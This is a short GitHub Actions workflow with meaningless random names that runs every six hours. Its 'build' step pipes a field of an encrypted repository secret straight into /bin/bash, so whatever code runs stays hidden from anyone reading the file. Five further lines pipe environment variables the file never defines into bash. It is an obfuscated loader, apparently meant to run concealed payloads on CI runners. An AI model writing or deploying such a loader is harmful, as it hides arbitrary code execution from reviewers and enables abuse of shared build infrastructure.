name: tulinglong4318
on:
  workflow_dispatch:
  schedule:
    - cron: '37 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tulinglong4318
        env:
          zfrt6: ${{ secrets.zfrt6 }}
        run: |
          echo $zfrt6 | jq -r .bzwa87 | /bin/bash
          echo $mt5 | jq -r .hmvrm3434 | /bin/bash
          echo $imexr4359 | jq -r .imutn1 | /bin/bash
          echo $tx6 | jq -r .a7 | /bin/bash
          echo $jki4389 | jq -r .e73248 | /bin/bash
          echo $hyo83 | jq -r .fwvdj68750 | /bin/bash

